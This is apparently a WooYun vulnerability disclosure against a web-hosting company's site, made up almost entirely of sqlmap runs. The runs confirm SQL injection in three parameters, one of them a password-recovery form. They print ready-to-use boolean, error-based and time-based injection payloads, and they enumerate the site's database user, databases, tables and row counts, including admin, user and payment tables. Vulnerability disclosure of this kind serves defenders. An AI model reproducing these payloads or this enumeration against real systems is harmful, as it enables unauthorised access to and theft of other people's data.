WooYun.org

http://**.**.**.**/doc/index.php?class=邮局相关

http://**.**.**.**/doc/index.php?class=邮局相关'

MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => select count(*) from 
doc where 1 and ClassName='邮局相关'' ) [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use near ''邮局相关''' at line 1 ) [3] => Array ( [errno] => 1064 ) 
)

sqlmap.py -u "http://**.**.**.**/doc/index.php?class=邮局相关" --threads 10 --dbms "MySQL"

[23:50:09] [INFO] testing connection to the target URL
[23:50:10] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[23:50:11] [INFO] target URL is stable
[23:50:11] [INFO] testing if GET parameter 'class' is dynamic
[23:50:12] [WARNING] GET parameter 'class' does not appear dynamic
[23:50:12] [INFO] heuristics detected web page charset 'utf-8'
[23:50:12] [INFO] heuristic (basic) test shows that GET parameter 'class' might
be injectable (possible DBMS: 'MySQL')
[23:50:12] [INFO] testing for SQL injection on GET parameter 'class'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you
want to skip test payloads specific for other DBMSes? [Y/n] y
do you want to include all tests for 'MySQL' extending provided level (1) and ri
sk (1)? [Y/n] y
[23:50:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:50:16] [WARNING] reflective value(s) found and filtering out
[23:50:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[23:50:30] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQ
L comment)'
[23:50:35] [INFO] heuristics detected web page charset 'ascii'
[23:50:36] [INFO] GET parameter 'class' seems to be 'OR boolean-based blind - WH
ERE or HAVING clause (MySQL comment)' injectable
[23:50:36] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:50:37] [INFO] GET parameter 'class' is 'MySQL >= 5.0 AND error-based - WHERE
 or HAVING clause' injectable
[23:50:37] [INFO] testing 'MySQL inline queries'
[23:50:37] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:50:37] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[23:50:37] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[23:50:37] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:50:37] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[23:50:38] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[23:50:50] [INFO] GET parameter 'class' seems to be 'MySQL < 5.0.12 AND time-bas
ed blind (heavy query)' injectable
[23:50:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:50:50] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[23:50:56] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[23:51:01] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[23:51:05] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[23:51:07] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[23:51:08] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[23:51:13] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[23:51:15] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[23:51:20] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[23:51:26] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns
'
[23:51:49] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[23:51:49] [WARNING] if the problem persists please try to lower the number of u
sed threads (option '--threads')
[23:52:11] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[23:52:33] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[23:52:55] [CRITICAL] unable to connect to the target URL or proxy
[23:53:00] [INFO] target URL appears to be UNION injectable with 97 columns
[23:54:18] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[23:54:40] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[23:55:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[23:55:24] [CRITICAL] unable to connect to the target URL or proxy
[23:55:45] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[23:56:31] [WARNING] if UNION based SQL injection is not detected, please consid
er and/or try to force the back-end DBMS (e.g. --dbms=mysql)
[23:56:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:56:35] [INFO] target URL appears to be UNION injectable with 8 columns
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]  y
[00:11:47] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
[00:11:47] [WARNING] in OR boolean-based injections, please consider usage of sw
itch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'class' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
[00:11:49] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://**.**.**.**/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 477 HTTP(s) req
uests:
---
Place: GET
Parameter: class
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: class=-9102' OR (3550=3550)#
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: class=????' AND (SELECT 9414 FROM(SELECT COUNT(*),CONCAT(0x71626572
71,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7164797771,FLOOR(RAND(0)
*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'IwBi'='IwBi
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: class=????' AND 7636=BENCHMARK(5000000,MD5(0x4772745a)) AND 'ESCx'=
'ESCx
---
[00:11:49] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
[00:12:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
[00:12:55] [INFO] fetching current user
[00:12:56] [INFO] heuristics detected web page charset 'utf-8'
[00:12:56] [WARNING] reflective value(s) found and filtering out
[00:12:56] [INFO] retrieved: gz3721@%
current user:    'gz3721@%'
[00:12:56] [INFO] fetching current database
[00:12:56] [INFO] retrieved: gz3721
current database:    'gz3721'
[00:12:56] [INFO] testing if current user is DBA
[00:12:56] [INFO] fetching current user
current user is DBA:    False
[00:13:14] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
[00:13:14] [INFO] fetching database users
[00:13:14] [INFO] heuristics detected web page charset 'utf-8'
[00:13:14] [WARNING] reflective value(s) found and filtering out
[00:13:14] [INFO] the SQL query used returns 1 entries
[00:13:14] [INFO] retrieved: 'gz3721'@'%'
database management system users [1]:
[*] 'gz3721'@'%'
[00:13:40] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
[00:13:40] [INFO] fetching database names
[00:13:40] [INFO] heuristics detected web page charset 'utf-8'
[00:13:40] [WARNING] reflective value(s) found and filtering out
[00:13:40] [INFO] the SQL query used returns 2 entries
[00:13:40] [INFO] starting 2 threads
[00:13:41] [INFO] retrieved: information_schema
[00:13:41] [INFO] retrieved: gz3721
available databases [2]:
[*] gz3721
[*] information_schema
Database: gz3721
[26 tables]
+---------------------------------------+
| 400                                   |
| database                              |
| domain                                |
| order                                 |
| admins                                |
| config                                |
| dcontact                              |
| doc                                   |
| email                                 |
| financial                             |
| getpwd                                |
| host                                  |
| mohost                                |
| news                                  |
| nicebox                               |
| nicecall                              |
| onlinepay                             |
| payment_type                          |
| products                              |
| qq                                    |
| question                              |
| secu_class                            |
| security                              |
| server                                |
| server_old                            |
| users                                 |
+---------------------------------------+
Database: gz3721
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| doc                                   | 247     |
| products                              | 227     |
| security                              | 48      |
| question                              | 46      |
| config                                | 33      |
| secu_class                            | 14      |
| users                                 | 13      |
| news                                  | 12      |
| financial                             | 8       |
| getpwd                                | 7       |
| `order`                               | 5       |
| onlinepay                             | 5       |
| payment_type                          | 5       |
| `domain`                              | 3       |
| dcontact                              | 3       |
| admins                                | 1       |
| email                                 | 1       |
| host                                  | 1       |
| qq                                    | 1       |
+---------------------------------------+---------+

http://**.**.**.**/user/getpwd.php

http://**.**.**.**/user/getpwd.php (POST)
UserName=admin&UserMail=111111&submit=%C8%A1  %BB%D8

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: UserName
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: UserName=admin' AND (SELECT 6049 FROM(SELECT COUNT(*),CONCAT(0x716e
6b6d71,(SELECT (CASE WHEN (6049=6049) THEN 1 ELSE 0 END)),0x717a6f6271,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'TEUP'='TEUP&
UserMail=111111&submit=%C8%A1  %BB%D8
---
[20:52:06] [INFO] testing MySQL
[20:52:06] [INFO] confirming MySQL
[20:52:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[20:52:06] [INFO] fetching current user
[20:52:06] [INFO] heuristics detected web page charset 'ascii'
[20:52:06] [WARNING] reflective value(s) found and filtering out
[20:52:06] [INFO] retrieved: gz3721@%
current user:    'gz3721@%'
[20:52:06] [INFO] fetching current database
[20:52:06] [INFO] retrieved: gz3721
current database:    'gz3721'
[20:52:06] [INFO] testing if current user is DBA
[20:52:06] [INFO] fetching current user
current user is DBA:    False

http://**.**.**.**/news/show.php?NewsID=35

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: NewsID
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: NewsID=35' AND (SELECT 3067 FROM(SELECT COUNT(*),CONCAT(0x717178777
1,(SELECT (CASE WHEN (3067=3067) THEN 1 ELSE 0 END)),0x7161717771,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wAfV'='wAfV
---
[21:03:16] [INFO] testing MySQL
[21:03:16] [INFO] confirming MySQL
[21:03:16] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[21:03:16] [INFO] fetching current user
[21:03:16] [INFO] heuristics detected web page charset 'ascii'
[21:03:16] [WARNING] reflective value(s) found and filtering out
[21:03:16] [INFO] retrieved: gz3721@%
current user:    'gz3721@%'
[21:03:16] [INFO] fetching current database
[21:03:19] [INFO] retrieved: gz3721
current database:    'gz3721'
[21:03:19] [INFO] testing if current user is DBA
[21:03:19] [INFO] fetching current user
current user is DBA:    False
[21:03:41] [INFO] testing MySQL
[21:03:41] [INFO] confirming MySQL
[21:03:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[21:03:41] [INFO] fetching database names
[21:03:42] [INFO] heuristics detected web page charset 'ascii'
[21:03:42] [WARNING] reflective value(s) found and filtering out
[21:03:42] [INFO] the SQL query used returns 2 entries
[21:03:42] [INFO] retrieved: information_schema
[21:03:43] [INFO] retrieved: gz3721
available databases [2]:
[*] gz3721
[*] information_schema

http://**.**.**.**/doc/show.php?DocID=172